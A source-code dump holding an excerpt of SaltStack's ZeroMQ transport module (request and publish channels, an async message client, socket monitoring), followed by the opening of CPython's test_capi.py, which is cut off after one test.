@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of attempts to make before failing
:param int timeout: The number of seconds on a response before failing
'''
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw)
raise salt.ext.tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.hexid = hashlib.sha1(salt.utils.stringutils.to_bytes(self.opts['id'])).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast')
if self.opts.get('__role') == 'syndic':
self._socket.setsockopt(zmq.SUBSCRIBE, b'syndic')
else:
self._socket.setsockopt(
zmq.SUBSCRIBE,
salt.utils.stringutils.to_bytes(self.hexid)
)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b'')
self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id']))
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'])
log.debug(
"Generated random reconnect delay between '%sms' and '%sms' (%s)",
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay
)
log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay)
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug(
"Setting zmq_reconnect_ivl_max to '%sms'",
self.opts['recon_default'] + self.opts['recon_max']
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def close(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
else:
self._stream.close(0)
elif hasattr(self, '_socket'):
self._socket.close(0)
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def destroy(self):
# Backwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@salt.ext.tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
# if this is changed from the default, we assume it was intentional
if int(self.opts.get('publish_port', 4506)) != 4506:
self.publish_port = self.opts.get('publish_port')
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds['publish_port']
log.debug('Connecting the Minion to the Master publish port, using the URI: %s', self.master_pub)
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return _get_master_uri(self.opts['master_ip'],
self.publish_port,
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_publish_port'))
@salt.ext.tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
# if it was one message, then it's the old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# two messages include a header which says who the message is for
elif messages_len == 2:
message_target = salt.utils.stringutils.to_str(messages[0])
if (self.opts.get('__role') != 'syndic' and message_target not in ('broadcast', self.hexid)) or \
(self.opts.get('__role') == 'syndic' and message_target not in ('broadcast', 'syndic')):
log.debug('Publish received for not this minion: %s', message_target)
raise salt.ext.tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub '
'message from master').format(messages_len))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise salt.ext.tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@salt.ext.tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
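# Rough usage sketch for this channel from inside a coroutine (hedged; 'opts'
# is assumed to be an ordinary minion opts dict, not shown here):
#   channel = AsyncZeroMQPubChannel(opts)
#   yield channel.connect()
#   channel.on_recv(lambda payload: log.debug('received %s', payload))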
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin,
salt.transport.server.ReqServerChannel):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
self.__setup_signals()
salt.utils.process.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
self._start_zmq_monitor()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except (KeyboardInterrupt, SystemExit):
break
def close(self):
'''
Cleanly shutdown the router socket
'''
if self._closing:
return
log.info('MWorkerQueue under PID %s is closing', os.getpid())
self._closing = True
# pylint: disable=E0203
if getattr(self, '_monitor', None) is not None:
self._monitor.stop()
self._monitor = None
if getattr(self, '_w_monitor', None) is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, 'clients') and self.clients.closed is False:
self.clients.close()
if hasattr(self, 'workers') and self.workers.closed is False:
self.workers.close()
if hasattr(self, 'stream'):
self.stream.close()
if hasattr(self, '_socket') and self._socket.closed is False:
self._socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
# pylint: enable=E0203
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def _start_zmq_monitor(self):
'''
Starts ZMQ monitor for debugging purposes.
:return:
'''
# Socket monitor shall be used only for debug
# purposes so using threading doesn't look too bad here
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
log.debug('Starting ZMQ monitor')
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
threading.Thread(target=self._w_monitor.start_poll).start()
log.debug('ZMQ monitor has been started')
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to be called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
self._start_zmq_monitor()
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket %s', self.w_uri)
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
Handle incoming messages from underlying TCP streams
:param ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc: # pylint: disable=broad-except
exc_type = type(exc).__name__
if exc_type == 'AuthenticationError':
log.debug(
'Minion failed to auth to master. Since the payload is '
'encrypted, it is not known which minion failed to '
'authenticate. It is likely that this is a transient '
'failure due to the master rotating its public key.'
)
else:
log.error('Bad load from minion: %s: %s', exc_type, exc)
stream.send(self.serial.dumps('bad load'))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: %s and load was %s', payload, payload.get('load'))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise salt.ext.tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if str('\0') in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise salt.ext.tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
'''
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
its host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and opts:
if 'tcp_keepalive' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE, opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl']
)
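# Illustrative opts fragment consumed above (values are examples only, not
# documented defaults):
#   {'tcp_keepalive': 1, 'tcp_keepalive_idle': 300,
#    'tcp_keepalive_cnt': -1, 'tcp_keepalive_intvl': -1}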
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
_sock_data = threading.local()
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return salt.ext.tornado.gen.sleep(5)
def _publish_daemon(self, log_queue=None):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
if log_queue:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
# if 2.1 <= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
pub_sock.setsockopt(zmq.LINGER, -1)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on %s', pub_uri)
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.bind(pull_uri)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
log.debug('Publish daemon getting data from puller %s', pull_uri)
package = pull_sock.recv()
log.debug('Publish daemon received payload. size=%d', len(package))
unpacked_package = salt.payload.unpackage(package)
if six.PY3:
unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package)
payload = unpacked_package['payload']
log.trace('Accepted unpacked package from puller')
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
log.trace('Sending filtered data over publisher %s', pub_uri)
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = salt.utils.stringutils.to_bytes(hashlib.sha1(salt.utils.stringutils.to_bytes(topic)).hexdigest())
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent')
# Syndic broadcast
if self.opts.get('order_masters'):
log.trace('Sending filtered data to syndic')
pub_sock.send(b'syndic', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent to syndic')
# otherwise it's a broadcast
else:
# TODO: constants file for "broadcast"
log.trace('Sending broadcasted data over publisher %s', pub_uri)
pub_sock.send(b'broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Broadcasted data has been sent')
else:
log.trace('Sending ZMQ-unfiltered data over publisher %s', pub_uri)
pub_sock.send(payload)
log.trace('Unfiltered data has been sent')
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except KeyboardInterrupt:
log.trace('Publish daemon caught keyboard interrupt, tearing down')
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.close()
if pull_sock.closed is False:
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager, kwargs=None):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
@property
def pub_sock(self):
'''
This thread's zmq publisher socket. This socket is stored on the class
so that multiple instantiations in the same thread will re-use a single
zmq socket.
'''
try:
return self._sock_data.sock
except AttributeError:
pass
def pub_connect(self):
'''
Create and connect this thread's zmq socket. If a publisher socket
already exists "pub_close" is called before creating and connecting a
new socket.
'''
if self.pub_sock:
self.pub_close()
ctx = zmq.Context.instance()
self._sock_data.sock = ctx.socket(zmq.PUSH)
self.pub_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
log.debug("Connecting to pub server: %s", pull_uri)
self.pub_sock.connect(pull_uri)
return self._sock_data.sock
def pub_close(self):
'''
Disconnect an existing publisher socket and remove it from the local
thread's cache.
'''
if hasattr(self._sock_data, 'sock'):
self._sock_data.sock.close()
delattr(self._sock_data, 'sock')
def publish(self, load):
'''
Publish "load" to minions. This send the load to the publisher daemon
process with does the actual sending to minions.
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
# Send the list of minions through so zmq can target them
int_payload['topic_lst'] = match_ids
payload = self.serial.dumps(int_payload)
log.debug(
'Sending payload to publish daemon. jid=%s size=%d',
load.get('jid', None), len(payload),
)
if not self.pub_sock:
self.pub_connect()
self.pub_sock.send(payload)
log.debug('Sent payload to publish daemon.')
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class of AsyncReqMessageClient to avoid blocking waiting while writing data to socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs)
self._closing = False
def close(self):
if self._closing:
return
self._closing = True
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def destroy(self):
# Backwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
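# A minimal sketch (not part of Salt) of the least-loaded selection that
# AsyncReqMessageClientPool.send() performs above: pick the client whose
# send_queue is currently shortest; min() avoids sorting the whole list.
def _example_pick_least_loaded(message_clients):
    return min(message_clients, key=lambda client: len(client.send_queue))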
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
This class wraps the underlying zeromq REQ socket and gives a future-based
interface to sending and receiving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future, if we decide to attempt to multiplex,
we can manage a pool of REQ/REP sockets -- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The ZMQ address to connect the REQ socket to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
self._closing = False
# TODO: timeout all in-flight sessions, or error
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, 'stream') and self.stream is not None:
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
else:
self.stream.close()
self.socket = None
self.stream = None
if self.context.closed is False:
self.context.term()
def destroy(self):
# Backwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
log.debug('Trying to connect to: %s', self.addr)
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
@salt.ext.tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timed out
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except Exception as err: # pylint: disable=broad-except
log.debug('Re-init ZMQ socket: %s', err)
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't already timed out
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug('SaltReqTimeoutError, retrying. (%s/%s)', future.attempts, future.tries)
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False):
'''
Return a future which will be completed when the message has a response
'''
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
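# A minimal sketch (not part of Salt) of driving the future-based send()
# interface from a coroutine. The opts dict and master address are
# hypothetical, and a real ReqServer must be listening for a reply to arrive.
@salt.ext.tornado.gen.coroutine
def _example_request(opts, addr='tcp://127.0.0.1:4506'):
    client = AsyncReqMessageClient(opts, addr)
    try:
        # send() returns a future; yielding it resolves to the decoded reply
        reply = yield client.send({'cmd': 'ping'}, timeout=5, tries=1)
    finally:
        client.close()
    raise salt.ext.tornado.gen.Return(reply)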
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: %s", evt)
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by definition,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
